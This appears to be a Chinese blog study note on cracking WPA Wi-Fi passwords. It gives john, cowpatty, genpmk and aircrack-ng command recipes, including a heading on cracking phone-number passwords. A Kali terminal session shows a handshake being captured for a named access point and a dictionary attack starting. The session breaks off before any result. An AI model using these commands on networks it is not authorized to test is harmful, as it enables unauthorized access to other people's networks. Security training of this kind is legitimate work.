【安全牛学习笔记】COWPATTY 破解密码

HTTP://ETUORLASLS.ORG/NETWORKING/802.11+SECURITY.+WI-FI+PROTECTED+ACCESS+AND+802.11I/

TR破解密码                                                                               

          测试效果                                                                                  

              john --wordlist=password.lst --rules --stdout | grep -i Password123                   

          破解调用                                                                                  

              john --wordlist=pass.list --rules --stdout | aircrack-ng -e kifi -w wpa.cap           

          北京联通手机号密码破解

COWPATTY破解密码                                          

          WPA密码通用破解工具                                       

          使用密码字典                                              

              cowpatty -r wpa.cap -f password.lst -s kifi           

          使用彩虹表(PMK)                                           

              genpmk -f password.lst -d pmkhash -s kifi             

              cowpatty -r wpa.cap -d pmkhash -s kifi

root@kali:~# ls
1                      dic                           wpa-01.kisment.csv     wpa-02.kisment.netxml  wpa-04.cap           下载  模板
2444.sh  Play0nLinux's virtual drives   wpa-01.kisment.netxml  wpa-03.cap             wpa-04.csv           公共  视频
5814.pl                rock                           wpa-02.cap             wpa-03.csv             wpa-04.kismet.csv    图片  音乐
??????                 wpa-01.cap                     wpa-02.csv             wpa-03.kismet.csv      wpa-04.kisment.netm  文档
backbox-4.4-amd64.iso  wpa-01.csv                     wpa-02.kisment.csv     wpa-03.kismet.netxml   www.csdn.net.sql

root@kali:~# rm wpa-0*
1         5814.pl   backbox-4.4-amd64.iso  PlayOnLinux's virtual dirves  www.csdn.net.sql  公共  文档  模板  音乐
2444.sh   ????      dict                   rock                                                             下载              图片  桌面  视频

root@kali:~# iwconfig
eth0      no wireless extensions.

at0       no wireless extensions.

wlan0mon  IEEE 802.11bgn  Mode:Monitor  Frequency:2.462 GHz Tx-Power=20 dBm
          Retry short limit:7   RTS thr:off    Fragment thr:off
          Power Management:off

lo        no wireless extensions.

root@kali:~# airodump-ng wlan0mon

root@kali:~# airodump-ng wlan0mon --bssid EC:26:CA:DC:29:B6 -c 11 -w wpa

root@kali:~# aircrack-ng -w /usr/share/john/password.lst wpa-01
wpa-01.cap            wpa-01.csv            wpa-01.kismet.csv      wpa-01.kisment.netxml
root@kali:~# aircrack-ng -w /usr/share/john/password.lst wpa-01
wpa-01.cap            wpa-01.csv            wpa-01.kismet.csv      wpa-01.kisment.netxml

root@kali:~# aircrack-ng -w /usr/share/john/password.lst wpa-01.cap
Opening wpa-01.cap
Read 18283 packets.

   #  BSSID                ESSID                   Encryption

   1  EC:26:CA:DC:29:B6    kifi                    WPA (1 handshake)

Choosing first network as target.

Opening wpa-01.cap

                               Aircrack-ng 1.2 rc2

  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值